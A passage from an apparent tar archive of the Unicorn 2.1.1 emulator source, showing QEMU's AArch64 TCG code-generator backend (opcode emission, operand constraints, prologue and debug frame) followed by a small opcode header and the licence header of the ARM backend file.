tcg_out_insn(s, 3510, EON, ext, a0, a1, a2); } break; case INDEX_op_not_i64: case INDEX_op_not_i32: tcg_out_insn(s, 3510, ORN, ext, a0, TCG_REG_XZR, a1); break; case INDEX_op_mul_i64: case INDEX_op_mul_i32: tcg_out_insn(s, 3509, MADD, ext, a0, a1, a2, TCG_REG_XZR); break; case INDEX_op_div_i64: case INDEX_op_div_i32: tcg_out_insn(s, 3508, SDIV, ext, a0, a1, a2); break; case INDEX_op_divu_i64: case INDEX_op_divu_i32: tcg_out_insn(s, 3508, UDIV, ext, a0, a1, a2); break; case INDEX_op_rem_i64: case INDEX_op_rem_i32: tcg_out_insn(s, 3508, SDIV, ext, TCG_REG_TMP, a1, a2); tcg_out_insn(s, 3509, MSUB, ext, a0, TCG_REG_TMP, a2, a1); break; case INDEX_op_remu_i64: case INDEX_op_remu_i32: tcg_out_insn(s, 3508, UDIV, ext, TCG_REG_TMP, a1, a2); tcg_out_insn(s, 3509, MSUB, ext, a0, TCG_REG_TMP, a2, a1); break; case INDEX_op_shl_i64: case INDEX_op_shl_i32: if (c2) { tcg_out_shl(s, ext, a0, a1, a2); } else { tcg_out_insn(s, 3508, LSLV, ext, a0, a1, a2); } break; case INDEX_op_shr_i64: case INDEX_op_shr_i32: if (c2) { tcg_out_shr(s, ext, a0, a1, a2); } else { tcg_out_insn(s, 3508, LSRV, ext, a0, a1, a2); } break; case INDEX_op_sar_i64: case INDEX_op_sar_i32: if (c2) { tcg_out_sar(s, ext, a0, a1, a2); } else { tcg_out_insn(s, 3508, ASRV, ext, a0, a1, a2); } break; case INDEX_op_rotr_i64: case INDEX_op_rotr_i32: if (c2) { tcg_out_rotr(s, ext, a0, a1, a2); } else { tcg_out_insn(s, 3508, RORV, ext, a0, a1, a2); } break; case INDEX_op_rotl_i64: case INDEX_op_rotl_i32: if (c2) { tcg_out_rotl(s, ext, a0, a1, a2); } else { tcg_out_insn(s, 3502, SUB, 0, TCG_REG_TMP, TCG_REG_XZR, a2); tcg_out_insn(s, 3508, RORV, ext, a0, a1, TCG_REG_TMP); } break; case INDEX_op_clz_i64: case INDEX_op_clz_i32: tcg_out_cltz(s, ext, a0, a1, a2, c2, false); break; case INDEX_op_ctz_i64: case INDEX_op_ctz_i32: tcg_out_cltz(s, ext, a0, a1, a2, c2, true); break; case INDEX_op_brcond_i32: a1 = (int32_t)a1; /* FALLTHRU */ case INDEX_op_brcond_i64: tcg_out_brcond(s, ext, a2, a0, a1, const_args[1], arg_label(args[3])); break; case INDEX_op_setcond_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_setcond_i64: tcg_out_cmp(s, ext, a1, a2, c2); /* Use CSET alias of CSINC Wd, WZR, WZR, invert(cond). */ tcg_out_insn(s, 3506, CSINC, TCG_TYPE_I32, a0, TCG_REG_XZR, TCG_REG_XZR, tcg_invert_cond(args[3])); break; case INDEX_op_movcond_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_movcond_i64: tcg_out_cmp(s, ext, a1, a2, c2); tcg_out_insn(s, 3506, CSEL, ext, a0, REG0(3), REG0(4), args[5]); break; case INDEX_op_qemu_ld_i32: case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, a0, a1, a2, ext); break; case INDEX_op_qemu_st_i32: case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, REG0(0), a1, a2); break; case INDEX_op_bswap64_i64: tcg_out_rev64(s, a0, a1); break; case INDEX_op_bswap32_i64: case INDEX_op_bswap32_i32: tcg_out_rev32(s, a0, a1); break; case INDEX_op_bswap16_i64: case INDEX_op_bswap16_i32: tcg_out_rev16(s, a0, a1); break; case INDEX_op_ext8s_i64: case INDEX_op_ext8s_i32: tcg_out_sxt(s, ext, MO_8, a0, a1); break; case INDEX_op_ext16s_i64: case INDEX_op_ext16s_i32: tcg_out_sxt(s, ext, MO_16, a0, a1); break; case INDEX_op_ext_i32_i64: case INDEX_op_ext32s_i64: tcg_out_sxt(s, TCG_TYPE_I64, MO_32, a0, a1); break; case INDEX_op_ext8u_i64: case INDEX_op_ext8u_i32: tcg_out_uxt(s, MO_8, a0, a1); break; case INDEX_op_ext16u_i64: case INDEX_op_ext16u_i32: tcg_out_uxt(s, MO_16, a0, a1); break; case INDEX_op_extu_i32_i64: case INDEX_op_ext32u_i64: tcg_out_movr(s, TCG_TYPE_I32, a0, a1); break; case INDEX_op_deposit_i64: case INDEX_op_deposit_i32: tcg_out_dep(s, ext, a0, REG0(2), args[3], args[4]); break; case INDEX_op_extract_i64: case INDEX_op_extract_i32: tcg_out_ubfm(s, ext, a0, a1, a2, a2 + args[3] - 1); break; case INDEX_op_sextract_i64: case INDEX_op_sextract_i32: tcg_out_sbfm(s, ext, a0, a1, a2, a2 + args[3] - 1); break; case INDEX_op_extract2_i64: case INDEX_op_extract2_i32: tcg_out_extr(s, ext, a0, REG0(2), REG0(1), args[3]); break; case INDEX_op_add2_i32: tcg_out_addsub2(s, TCG_TYPE_I32, a0, a1, REG0(2), REG0(3), (int32_t)args[4], args[5], const_args[4], const_args[5], false); break; case INDEX_op_add2_i64: tcg_out_addsub2(s, TCG_TYPE_I64, a0, a1, REG0(2), REG0(3), args[4], args[5], const_args[4], const_args[5], false); break; case INDEX_op_sub2_i32: tcg_out_addsub2(s, TCG_TYPE_I32, a0, a1, REG0(2), REG0(3), (int32_t)args[4], args[5], const_args[4], const_args[5], true); break; case INDEX_op_sub2_i64: tcg_out_addsub2(s, TCG_TYPE_I64, a0, a1, REG0(2), REG0(3), args[4], args[5], const_args[4], const_args[5], true); break; case INDEX_op_muluh_i64: tcg_out_insn(s, 3508, UMULH, TCG_TYPE_I64, a0, a1, a2); break; case INDEX_op_mulsh_i64: tcg_out_insn(s, 3508, SMULH, TCG_TYPE_I64, a0, a1, a2); break; case INDEX_op_mb: tcg_out_mb(s, a0); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. */ default: g_assert_not_reached(); } #undef REG0 } static void tcg_out_vec_op(TCGContext *s, TCGOpcode opc, unsigned vecl, unsigned vece, const TCGArg *args, const int *const_args) { static const AArch64Insn cmp_insn[16] = { [TCG_COND_EQ] = I3616_CMEQ, [TCG_COND_GT] = I3616_CMGT, [TCG_COND_GE] = I3616_CMGE, [TCG_COND_GTU] = I3616_CMHI, [TCG_COND_GEU] = I3616_CMHS, }; static const AArch64Insn cmp0_insn[16] = { [TCG_COND_EQ] = I3617_CMEQ0, [TCG_COND_GT] = I3617_CMGT0, [TCG_COND_GE] = I3617_CMGE0, [TCG_COND_LT] = I3617_CMLT0, [TCG_COND_LE] = I3617_CMLE0, }; TCGType type = vecl + TCG_TYPE_V64; unsigned is_q = vecl; TCGArg a0, a1, a2, a3; int cmode, imm8; a0 = args[0]; a1 = args[1]; a2 = args[2]; switch (opc) { case INDEX_op_ld_vec: tcg_out_ld(s, type, a0, a1, a2); break; case INDEX_op_st_vec: tcg_out_st(s, type, a0, a1, a2); break; case INDEX_op_dupm_vec: tcg_out_dupm_vec(s, type, vece, a0, a1, a2); break; case INDEX_op_add_vec: tcg_out_insn(s, 3616, ADD, is_q, vece, a0, a1, a2); break; case INDEX_op_sub_vec: tcg_out_insn(s, 3616, SUB, is_q, vece, a0, a1, a2); break; case INDEX_op_mul_vec: tcg_out_insn(s, 3616, MUL, is_q, vece, a0, a1, a2); break; case INDEX_op_neg_vec: tcg_out_insn(s, 3617, NEG, is_q, vece, a0, a1); break; case INDEX_op_abs_vec: tcg_out_insn(s, 3617, ABS, is_q, vece, a0, a1); break; case INDEX_op_and_vec: if (const_args[2]) { is_shimm1632(~a2, &cmode, &imm8); if (a0 == a1) { tcg_out_insn(s, 3606, BIC, is_q, a0, 0, cmode, imm8); return; } tcg_out_insn(s, 3606, MVNI, is_q, a0, 0, cmode, imm8); a2 = a0; } tcg_out_insn(s, 3616, AND, is_q, 0, a0, a1, a2); break; case INDEX_op_or_vec: if (const_args[2]) { is_shimm1632(a2, &cmode, &imm8); if (a0 == a1) { tcg_out_insn(s, 3606, ORR, is_q, a0, 0, cmode, imm8); return; } tcg_out_insn(s, 3606, MOVI, is_q, a0, 0, cmode, imm8); a2 = a0; } tcg_out_insn(s, 3616, ORR, is_q, 0, a0, a1, a2); break; case INDEX_op_andc_vec: if (const_args[2]) { is_shimm1632(a2, &cmode, &imm8); if (a0 == a1) { tcg_out_insn(s, 3606, BIC, is_q, a0, 0, cmode, imm8); return; } tcg_out_insn(s, 3606, MOVI, is_q, a0, 0, cmode, imm8); a2 = a0; } tcg_out_insn(s, 3616, BIC, is_q, 0, a0, a1, a2); break; case INDEX_op_orc_vec: if (const_args[2]) { is_shimm1632(~a2, &cmode, &imm8); if (a0 == a1) { tcg_out_insn(s, 3606, ORR, is_q, a0, 0, cmode, imm8); return; } tcg_out_insn(s, 3606, MVNI, is_q, a0, 0, cmode, imm8); a2 = a0; } tcg_out_insn(s, 3616, ORN, is_q, 0, a0, a1, a2); break; case INDEX_op_xor_vec: tcg_out_insn(s, 3616, EOR, is_q, 0, a0, a1, a2); break; case INDEX_op_ssadd_vec: tcg_out_insn(s, 3616, SQADD, is_q, vece, a0, a1, a2); break; case INDEX_op_sssub_vec: tcg_out_insn(s, 3616, SQSUB, is_q, vece, a0, a1, a2); break; case INDEX_op_usadd_vec: tcg_out_insn(s, 3616, UQADD, is_q, vece, a0, a1, a2); break; case INDEX_op_ussub_vec: tcg_out_insn(s, 3616, UQSUB, is_q, vece, a0, a1, a2); break; case INDEX_op_smax_vec: tcg_out_insn(s, 3616, SMAX, is_q, vece, a0, a1, a2); break; case INDEX_op_smin_vec: tcg_out_insn(s, 3616, SMIN, is_q, vece, a0, a1, a2); break; case INDEX_op_umax_vec: tcg_out_insn(s, 3616, UMAX, is_q, vece, a0, a1, a2); break; case INDEX_op_umin_vec: tcg_out_insn(s, 3616, UMIN, is_q, vece, a0, a1, a2); break; case INDEX_op_not_vec: tcg_out_insn(s, 3617, NOT, is_q, 0, a0, a1); break; case INDEX_op_shli_vec: tcg_out_insn(s, 3614, SHL, is_q, a0, a1, a2 + (8 << vece)); break; case INDEX_op_shri_vec: tcg_out_insn(s, 3614, USHR, is_q, a0, a1, (16 << vece) - a2); break; case INDEX_op_sari_vec: tcg_out_insn(s, 3614, SSHR, is_q, a0, a1, (16 << vece) - a2); break; case INDEX_op_shlv_vec: tcg_out_insn(s, 3616, USHL, is_q, vece, a0, a1, a2); break; case INDEX_op_aa64_sshl_vec: tcg_out_insn(s, 3616, SSHL, is_q, vece, a0, a1, a2); break; case INDEX_op_cmp_vec: { TCGCond cond = args[3]; AArch64Insn insn; if (cond == TCG_COND_NE) { if (const_args[2]) { tcg_out_insn(s, 3616, CMTST, is_q, vece, a0, a1, a1); } else { tcg_out_insn(s, 3616, CMEQ, is_q, vece, a0, a1, a2); tcg_out_insn(s, 3617, NOT, is_q, 0, a0, a0); } } else { if (const_args[2]) { insn = cmp0_insn[cond]; if (insn) { tcg_out_insn_3617(s, insn, is_q, vece, a0, a1); break; } tcg_out_dupi_vec(s, type, TCG_VEC_TMP, 0); a2 = TCG_VEC_TMP; } insn = cmp_insn[cond]; if (insn == 0) { TCGArg t; t = a1, a1 = a2, a2 = t; cond = tcg_swap_cond(cond); insn = cmp_insn[cond]; tcg_debug_assert(insn != 0); } tcg_out_insn_3616(s, insn, is_q, vece, a0, a1, a2); } } break; case INDEX_op_bitsel_vec: a3 = args[3]; if (a0 == a3) { tcg_out_insn(s, 3616, BIT, is_q, 0, a0, a2, a1); } else if (a0 == a2) { tcg_out_insn(s, 3616, BIF, is_q, 0, a0, a3, a1); } else { if (a0 != a1) { tcg_out_mov(s, type, a0, a1); } tcg_out_insn(s, 3616, BSL, is_q, 0, a0, a2, a3); } break; case INDEX_op_mov_vec: /* Always emitted via tcg_out_mov. */ case INDEX_op_dupi_vec: /* Always emitted via tcg_out_movi. */ case INDEX_op_dup_vec: /* Always emitted via tcg_out_dup_vec. */ default: g_assert_not_reached(); } } int tcg_can_emit_vec_op(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece) { switch (opc) { case INDEX_op_add_vec: case INDEX_op_sub_vec: case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_andc_vec: case INDEX_op_orc_vec: case INDEX_op_neg_vec: case INDEX_op_abs_vec: case INDEX_op_not_vec: case INDEX_op_cmp_vec: case INDEX_op_shli_vec: case INDEX_op_shri_vec: case INDEX_op_sari_vec: case INDEX_op_ssadd_vec: case INDEX_op_sssub_vec: case INDEX_op_usadd_vec: case INDEX_op_ussub_vec: case INDEX_op_shlv_vec: case INDEX_op_bitsel_vec: return 1; case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: return -1; case INDEX_op_mul_vec: case INDEX_op_smax_vec: case INDEX_op_smin_vec: case INDEX_op_umax_vec: case INDEX_op_umin_vec: return vece < MO_64; default: return 0; } } void tcg_expand_vec_op(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg a0, ...) { va_list va; TCGv_vec v0, v1, v2, t1; va_start(va, a0); v0 = temp_tcgv_vec(tcg_ctx, arg_temp(a0)); v1 = temp_tcgv_vec(tcg_ctx, arg_temp(va_arg(va, TCGArg))); v2 = temp_tcgv_vec(tcg_ctx, arg_temp(va_arg(va, TCGArg))); switch (opc) { case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: /* Right shifts are negative left shifts for AArch64. */ t1 = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_neg_vec(tcg_ctx, vece, t1, v2); opc = (opc == INDEX_op_shrv_vec ? INDEX_op_shlv_vec : INDEX_op_aa64_sshl_vec); vec_gen_3(tcg_ctx, opc, type, vece, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, t1)); tcg_temp_free_vec(tcg_ctx, t1); break; default: g_assert_not_reached(); } va_end(va); } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef w_w = { .args_ct_str = { "w", "w" } }; static const TCGTargetOpDef w_r = { .args_ct_str = { "w", "r" } }; static const TCGTargetOpDef w_wr = { .args_ct_str = { "w", "wr" } }; static const TCGTargetOpDef r_l = { .args_ct_str = { "r", "l" } }; static const TCGTargetOpDef r_rA = { .args_ct_str = { "r", "rA" } }; static const TCGTargetOpDef rZ_r = { .args_ct_str = { "rZ", "r" } }; static const TCGTargetOpDef lZ_l = { .args_ct_str = { "lZ", "l" } }; static const TCGTargetOpDef r_r_r = { .args_ct_str = { "r", "r", "r" } }; static const TCGTargetOpDef w_w_w = { .args_ct_str = { "w", "w", "w" } }; static const TCGTargetOpDef w_w_wO = { .args_ct_str = { "w", "w", "wO" } }; static const TCGTargetOpDef w_w_wN = { .args_ct_str = { "w", "w", "wN" } }; static const TCGTargetOpDef w_w_wZ = { .args_ct_str = { "w", "w", "wZ" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_r_rA = { .args_ct_str = { "r", "r", "rA" } }; static const TCGTargetOpDef r_r_rL = { .args_ct_str = { "r", "r", "rL" } }; static const TCGTargetOpDef r_r_rAL = { .args_ct_str = { "r", "r", "rAL" } }; static const TCGTargetOpDef dep = { .args_ct_str = { "r", "0", "rZ" } }; static const TCGTargetOpDef ext2 = { .args_ct_str = { "r", "rZ", "rZ" } }; static const TCGTargetOpDef movc = { .args_ct_str = { "r", "r", "rA", "rZ", "rZ" } }; static const TCGTargetOpDef add2 = { .args_ct_str = { "r", "r", "rZ", "rZ", "rA", "rMZ" } }; static const TCGTargetOpDef w_w_w_w = { .args_ct_str = { "w", "w", "w", "w" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i64: case INDEX_op_ld32u_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld_i64: case INDEX_op_neg_i32: case INDEX_op_neg_i64: case INDEX_op_not_i32: case INDEX_op_not_i64: case INDEX_op_bswap16_i32: case INDEX_op_bswap32_i32: case INDEX_op_bswap16_i64: case INDEX_op_bswap32_i64: case INDEX_op_bswap64_i64: case INDEX_op_ext8s_i32: case INDEX_op_ext16s_i32: case INDEX_op_ext8u_i32: case INDEX_op_ext16u_i32: case INDEX_op_ext8s_i64: case INDEX_op_ext16s_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext8u_i64: case INDEX_op_ext16u_i64: case INDEX_op_ext32u_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: case INDEX_op_extract_i32: case INDEX_op_extract_i64: case INDEX_op_sextract_i32: case INDEX_op_sextract_i64: return &r_r; case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: case INDEX_op_st8_i64: case INDEX_op_st16_i64: case INDEX_op_st32_i64: case INDEX_op_st_i64: return &rZ_r; case INDEX_op_add_i32: case INDEX_op_add_i64: case INDEX_op_sub_i32: case INDEX_op_sub_i64: case INDEX_op_setcond_i32: case INDEX_op_setcond_i64: return &r_r_rA; case INDEX_op_mul_i32: case INDEX_op_mul_i64: case INDEX_op_div_i32: case INDEX_op_div_i64: case INDEX_op_divu_i32: case INDEX_op_divu_i64: case INDEX_op_rem_i32: case INDEX_op_rem_i64: case INDEX_op_remu_i32: case INDEX_op_remu_i64: case INDEX_op_muluh_i64: case INDEX_op_mulsh_i64: return &r_r_r; case INDEX_op_and_i32: case INDEX_op_and_i64: case INDEX_op_or_i32: case INDEX_op_or_i64: case INDEX_op_xor_i32: case INDEX_op_xor_i64: case INDEX_op_andc_i32: case INDEX_op_andc_i64: case INDEX_op_orc_i32: case INDEX_op_orc_i64: case INDEX_op_eqv_i32: case INDEX_op_eqv_i64: return &r_r_rL; case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: case INDEX_op_rotl_i32: case INDEX_op_rotr_i32: case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: case INDEX_op_rotl_i64: case INDEX_op_rotr_i64: return &r_r_ri; case INDEX_op_clz_i32: case INDEX_op_ctz_i32: case INDEX_op_clz_i64: case INDEX_op_ctz_i64: return &r_r_rAL; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: return &r_rA; case INDEX_op_movcond_i32: case INDEX_op_movcond_i64: return &movc; case INDEX_op_qemu_ld_i32: case INDEX_op_qemu_ld_i64: return &r_l; case INDEX_op_qemu_st_i32: case INDEX_op_qemu_st_i64: return &lZ_l; case INDEX_op_deposit_i32: case INDEX_op_deposit_i64: return &dep; case INDEX_op_extract2_i32: case INDEX_op_extract2_i64: return &ext2; case INDEX_op_add2_i32: case INDEX_op_add2_i64: case INDEX_op_sub2_i32: case INDEX_op_sub2_i64: return &add2; case INDEX_op_add_vec: case INDEX_op_sub_vec: case INDEX_op_mul_vec: case INDEX_op_xor_vec: case INDEX_op_ssadd_vec: case INDEX_op_sssub_vec: case INDEX_op_usadd_vec: case INDEX_op_ussub_vec: case INDEX_op_smax_vec: case INDEX_op_smin_vec: case INDEX_op_umax_vec: case INDEX_op_umin_vec: case INDEX_op_shlv_vec: case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: case INDEX_op_aa64_sshl_vec: return &w_w_w; case INDEX_op_not_vec: case INDEX_op_neg_vec: case INDEX_op_abs_vec: case INDEX_op_shli_vec: case INDEX_op_shri_vec: case INDEX_op_sari_vec: return &w_w; case INDEX_op_ld_vec: case INDEX_op_st_vec: case INDEX_op_dupm_vec: return &w_r; case INDEX_op_dup_vec: return &w_wr; case INDEX_op_or_vec: case INDEX_op_andc_vec: return &w_w_wO; case INDEX_op_and_vec: case INDEX_op_orc_vec: return &w_w_wN; case INDEX_op_cmp_vec: return &w_w_wZ; case INDEX_op_bitsel_vec: return &w_w_w_w; default: return NULL; } } static void tcg_target_init(TCGContext *s) { s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffffffffu; s->tcg_target_available_regs[TCG_TYPE_I64] = 0xffffffffu; s->tcg_target_available_regs[TCG_TYPE_V64] = 0xffffffff00000000ull; s->tcg_target_available_regs[TCG_TYPE_V128] = 0xffffffff00000000ull; s->tcg_target_call_clobber_regs = -1ull; tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X19); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X20); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X21); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X22); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X23); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X24); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X25); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X26); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X27); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X28); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X29); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V8); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V9); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V10); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V11); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V12); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V13); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V14); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V15); s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_REG_SP); tcg_regset_set_reg(s->reserved_regs, TCG_REG_FP); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP); tcg_regset_set_reg(s->reserved_regs, TCG_REG_X18); /* platform register */ tcg_regset_set_reg(s->reserved_regs, TCG_VEC_TMP); } /* Saving pairs: (X19, X20) .. (X27, X28), (X29(fp), X30(lr)). */ #define PUSH_SIZE ((30 - 19 + 1) * 8) #define FRAME_SIZE \ ((PUSH_SIZE \ + TCG_STATIC_CALL_ARGS_SIZE \ + CPU_TEMP_BUF_NLONGS * sizeof(long) \ + TCG_TARGET_STACK_ALIGN - 1) \ & ~(TCG_TARGET_STACK_ALIGN - 1)) /* We're expecting a 2 byte uleb128 encoded value. */ QEMU_BUILD_BUG_ON(FRAME_SIZE >= (1 << 14)); /* We're expecting to use a single ADDI insn. */ QEMU_BUILD_BUG_ON(FRAME_SIZE - PUSH_SIZE > 0xfff); static void tcg_target_qemu_prologue(TCGContext *s) { TCGReg r; /* Push (FP, LR) and allocate space for all saved registers. */ tcg_out_insn(s, 3314, STP, TCG_REG_FP, TCG_REG_LR, TCG_REG_SP, -PUSH_SIZE, 1, 1); /* Set up frame pointer for canonical unwinding. */ tcg_out_movr_sp(s, TCG_TYPE_I64, TCG_REG_FP, TCG_REG_SP); /* Store callee-preserved regs x19..x28. */ for (r = TCG_REG_X19; r <= TCG_REG_X27; r += 2) { int ofs = (r - TCG_REG_X19 + 2) * 8; tcg_out_insn(s, 3314, STP, r, r + 1, TCG_REG_SP, ofs, 1, 0); } /* Make stack space for TCG locals. */ tcg_out_insn(s, 3401, SUBI, TCG_TYPE_I64, TCG_REG_SP, TCG_REG_SP, FRAME_SIZE - PUSH_SIZE); /* Inform TCG about how to find TCG locals with register, offset, size. */ tcg_set_frame(s, TCG_REG_SP, TCG_STATIC_CALL_ARGS_SIZE, CPU_TEMP_BUF_NLONGS * sizeof(long)); #if !defined(CONFIG_SOFTMMU) if (USE_GUEST_BASE) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_GUEST_BASE, guest_base); tcg_regset_set_reg(s->reserved_regs, TCG_REG_GUEST_BASE); } #endif tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); tcg_out_insn(s, 3207, BR, tcg_target_call_iarg_regs[1]); /* * Return path for goto_ptr. Set return value to 0, a-la exit_tb, * and fall through to the rest of the epilogue. */ s->code_gen_epilogue = s->code_ptr; tcg_out_movi(s, TCG_TYPE_REG, TCG_REG_X0, 0); /* TB epilogue */ tb_ret_addr = s->code_ptr; /* Remove TCG locals stack space. */ tcg_out_insn(s, 3401, ADDI, TCG_TYPE_I64, TCG_REG_SP, TCG_REG_SP, FRAME_SIZE - PUSH_SIZE); /* Restore registers x19..x28. */ for (r = TCG_REG_X19; r <= TCG_REG_X27; r += 2) { int ofs = (r - TCG_REG_X19 + 2) * 8; tcg_out_insn(s, 3314, LDP, r, r + 1, TCG_REG_SP, ofs, 1, 0); } /* Pop (FP, LR), restore SP to previous frame. */ tcg_out_insn(s, 3314, LDP, TCG_REG_FP, TCG_REG_LR, TCG_REG_SP, PUSH_SIZE, 0, 1); tcg_out_insn(s, 3207, RET, TCG_REG_LR); } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { int i; for (i = 0; i < count; ++i) { p[i] = NOP; } } typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[4]; uint8_t fde_reg_ofs[24]; } DebugFrame; #define ELF_HOST_MACHINE EM_AARCH64 static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = 0x78, /* sleb128 -8 */ .h.cie.return_column = TCG_REG_LR, /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { 12, TCG_REG_SP, /* DW_CFA_def_cfa sp, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) }, .fde_reg_ofs = { 0x80 + 28, 1, /* DW_CFA_offset, x28, -8 */ 0x80 + 27, 2, /* DW_CFA_offset, x27, -16 */ 0x80 + 26, 3, /* DW_CFA_offset, x26, -24 */ 0x80 + 25, 4, /* DW_CFA_offset, x25, -32 */ 0x80 + 24, 5, /* DW_CFA_offset, x24, -40 */ 0x80 + 23, 6, /* DW_CFA_offset, x23, -48 */ 0x80 + 22, 7, /* DW_CFA_offset, x22, -56 */ 0x80 + 21, 8, /* DW_CFA_offset, x21, -64 */ 0x80 + 20, 9, /* DW_CFA_offset, x20, -72 */ 0x80 + 19, 10, /* DW_CFA_offset, x1p, -80 */ 0x80 + 30, 11, /* DW_CFA_offset, lr, -88 */ 0x80 + 29, 12, /* DW_CFA_offset, fp, -96 */ } }; void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame)); } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/aarch64/tcg-target.opc.h�����������������������������������������������������0000664�0000000�0000000�00000000671�14675241067�0021156�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (c) 2019 Linaro * * This work is licensed under the terms of the GNU GPL, version 2 or * (at your option) any later version. * * See the COPYING file in the top-level directory for details. * * Target-specific opcodes for host vector expansion. These will be * emitted by tcg_expand_vec_op. For those familiar with GCC internals, * consider these to be UNSPEC with names. */ DEF(aa64_sshl_vec, 1, 2, 0, IMPLVEC) �����������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/arm/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015507�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/arm/tcg-target.h�������������������������������������������������������������0000664�0000000�0000000�00000011740�14675241067�0017724�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * Copyright (c) 2008 Andrzej Zaborowski * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ 